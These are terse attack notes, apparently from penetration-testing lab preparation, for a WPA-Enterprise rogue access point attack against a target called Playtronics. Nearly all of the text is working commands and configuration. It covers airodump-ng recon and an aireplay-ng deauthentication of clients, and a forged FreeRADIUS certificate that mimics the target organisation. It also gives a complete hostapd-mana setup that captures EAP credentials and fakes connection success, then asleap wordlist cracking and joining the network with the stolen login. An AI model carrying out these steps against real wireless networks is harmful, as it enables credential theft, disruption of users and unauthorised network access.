WPA-MGT
WPA-Enterprise rogue AP attack
Setup
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
Capture + output as recon-01.pcap
# -c channel; -w output filename prefix (airodump-ng numbers the files recon-01, recon-02, ...)
sudo airodump-ng -c # --essid AP_NAME --bssid XX:XX:XX:XX:XX:XX -w recon --output-format pcap wlan0mon
Optionally deauthenticate a client once so that it reconnects and the certificate exchange is captured
#-a AP -c Client
sudo aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY wlan0mon
Review the traffic / recon-01.pcap to get cert info
#wireshark filter
tls.handshake.type == 11,3
# or
tls.handshake.certificate

Review cert info
openssl x509 -inform der -in CERTIFICATE_FILENAME -text
Preparation
Edit freeradius cert config (as root user)
# /etc/freeradius/3.0/certs/ca.cnf ([email protected])
[certificate_authority]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = [email protected]
commonName = "Playtronics Certificate Authority"
# /etc/freeradius/3.0/certs/server.cnf ([email protected])
[server]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = [email protected]
commonName = "Playtronics"
Create fake cert (as root user)
sudo su
cd /etc/freeradius/3.0/certs/
rm dh && make
# an error about client.cnf is expected: it was not configured because it is not needed here
Setup rogue AP with hostapd-mana
Create mana.conf and mana.eap_user in /etc/hostapd-mana/ (as root)
#/etc/hostapd-mana/mana.eap_user
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
#/etc/hostapd-mana/mana.conf
# SSID of the AP
# UPDATE: hostapd does not strip trailing comments, so keep the marker on its own line
ssid=Playtronics
# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=wlan0
driver=nl80211
# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)
# UPDATE: hostapd does not strip trailing comments, so keep the marker on its own line
channel=1
# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
# g for 2.4GHz, a for 5GHz (hostapd does not accept a trailing comment on this line)
hw_mode=g
# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1
# Key workaround for Win XP
eapol_key_index_workaround=0
# EAP user file we created earlier
eap_user_file=/etc/hostapd-mana/mana.eap_user
# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
# Open authentication
auth_algs=1
# WPA/WPA2
wpa=3
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP
# Enable Mana WPE
mana_wpe=1
# Store credentials in that file
mana_credout=/tmp/hostapd.credout
# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1
# EAP TLS MitM
mana_eaptls=1
Launch rogue AP
sudo hostapd-mana /etc/hostapd-mana/mana.conf
Retrieve credentials with the asleap command provided by mana
# -W appends a wordlist to the asleap crack command
<asleap cmd> -W /usr/share/john/password.lst

Connect to the network with retrieved credentials
Create wpa_supplicant.conf
wpa_supplicant.conf
network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Connect to network
wpa_supplicant -c <config file>
sudo dhclient wlan0
Get proof
curl http://192.168.1.1/proof.txt